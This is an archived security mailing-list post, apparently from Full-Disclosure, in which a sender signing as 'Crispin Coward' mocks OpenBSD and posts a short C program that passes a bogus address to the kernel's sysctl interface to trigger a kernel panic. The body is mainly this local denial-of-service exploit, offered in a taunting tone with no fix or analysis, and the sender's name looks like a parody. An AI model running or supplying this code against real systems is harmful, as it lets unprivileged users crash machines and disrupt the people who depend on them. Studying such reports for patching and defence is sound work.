lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
From: crispin at immunix.com (crispin@...unix.com)
Subject: OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0

ppl think "hey, local DoS sucks", therefore they are.
i think "hey, obsd sucks", therefore i am.


#include <stdio.h>
#include <sys/param.h>
#include <sys/sysctl.h>

int main ()
{
        unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;

        return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
}

it's wide, it's opened, it's surely obsd!

--
Crispin Coward, Ph.D.          http://immunix.com/~crispin/
Chief Scientist, Immunix       http://immunix.com
            http://www.immunix.com/tosell/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ